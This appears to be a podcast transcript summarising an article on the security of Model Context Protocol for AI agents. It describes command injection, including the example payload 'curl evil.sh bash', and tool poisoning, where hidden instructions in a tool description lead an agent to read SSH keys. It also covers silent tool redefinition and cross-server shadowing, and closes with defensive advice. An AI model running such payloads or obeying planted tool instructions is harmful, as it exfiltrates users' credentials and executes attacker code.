Welcome to Tech Bytes and News, your daily roundup of articles featured in Hacker News. Today, we're diving into a critical piece about the security of Model Context Protocol, or MCP. It's titled, "The S in MCP stands for security." But, spoiler alert, it doesn't. At least not yet.
MCP, huh? I've heard whispers. Isn't that supposed to be like the USB-C for AI agents, connecting them to all sorts of tools and data?
Exactly. It's designed to standardize how large language models, or LLMs, like Claude or GPT, interact with the outside world. Think standardized APIs, persistent sessions, context sharing, the whole 9 yards.
Sounds amazing. So what's the catch? Why the ominous tone about security?
Well, that's the thing. The author, Elena Cross, points out that MCP is not secure by default. And that's a huge problem. If you're plugging your agents into random servers without being careful, you could be opening up some serious vulnerabilities.
Whoa, hold on. What kind of vulnerabilities are we talking about here? Is it just theoretical, or are there actual exploits in the wild?
Oh, it's real. Elena outlines several attack vectors. The first one is command injection. Apparently, Equixly security research found that over 43% of MCP server implementations they tested had unsafe shell calls.
Command injection? In 2025? I thought we'd solved that problem decades ago. How is that even possible?
It's the AI twist, right? Imagine a notify function that takes a message and uses os.system to send a notification. An attacker could inject a payload like curl evil.sh bash into the message parameter. Suddenly, your trusted agent is executing remote code.
Ouch! That's nasty. So what's next on the list of horrors?
Next up is tool poisoning attacks, which Invariant Labs described. This one's sneaky. The attacker hides malicious instructions inside the MCP tool's description. The user doesn't see it, but the AI agent does.
Wait, so the AI is reading instructions that the user isn't even aware of? That sounds like a recipe for disaster.
Exactly. The article gives an example of an add function that, in addition to adding 2 numbers, also reads your SSH keys. You think you're just adding 2 plus 2, but the agent is also stealing your credentials.
This is getting worse and worse. What else is lurking in the shadows of MCP?
There's the rug pull, or silent redefinition. MCP tools can actually change their own definitions after they've been installed. You approve a safe-looking tool on day 1, and by day 7, it's rerouting your API keys to an attacker.
That's like a supply chain attack, but for AI agents. So you can't even trust a tool after you've installed it?
Precisely. And to top it all off, there's cross-server tool shadowing. If you have multiple servers connected to the same agent, a malicious one can override or intercept calls made to a trusted one.
So a bad server could, send emails to an attacker while pretending it went to a user? Or inject malicious logic into other tools?
Yep, it's as bad as it sounds. Data exfiltration, stealth logic, the whole shebang.
Okay, I'm officially terrified. Why is MCP so vulnerable in the first place? What went wrong?
Well, according to the article, MCP's priorities were easy integrations and unified interfaces. Security seems to have been an afterthought. There's no authentication standard, no context encryption, and no way to verify tool integrity.
So it's like they built a super fast car without any brakes or seatbelts?
Pretty much. There's no mechanism to say, this tool hasn't been tampered with, and users don't even see the full tool instructions that the agent sees.
Alright, doom and gloom aside, what can we actually do about this? Are we just supposed to throw our hands up and abandon AI agents?
Definitely not. Elena provides some concrete steps for developers, platform builders, and users.
Okay, I'm listening. What should developers be doing?
Developers need to go back to basics. Input validation, input validation, input validation. Also, pin versions of MCP servers and tools, and sanitize those tool descriptions like their lives depend on it.
Makes sense. What about the platform builders, the ones creating these MCP ecosystems?
They need to display the full tool metadata, use integrity hashes for server updates, and enforce session security. Basically, build in the security measures that MCP is currently lacking.
And what about us, the poor users who just want to use these AI tools without getting hacked?
The advice is pretty straightforward. Don't connect to random servers, monitor session behavior like you're watching prod logs, and watch out for unexpected tool updates. Basically, be paranoid.
So, it's all about vigilance and best practices. But is there anything more proactive we can do?
That's where Elena's idea for scanmcp.com comes in. She envisions a scanner and dashboard that audits connected MCP tools, flags risks like RCE and tool poisoning, and shows you what your agent sees versus what you see.
That sounds amazing. A sort of Nessus or Qualys, but for AI agents?
Exactly. Perfect for agent platform security teams, AI infra startups, and independent tool builders who care about trust.
So the takeaway here is that MCP is powerful, but it's also a potential security nightmare waiting to happen?
That's the gist of it. We're seeing history repeat itself, with all the speed of AI agents and none of the maturity of API security. Until we get secure by default protocols, tools like scanmcp.com might be our best bet for visibility and control.
So does the S in MCP stand for security?
No, but it should. Thanks for tuning in to Tech Bytes and News. Stay safe out there.
Bye-bye.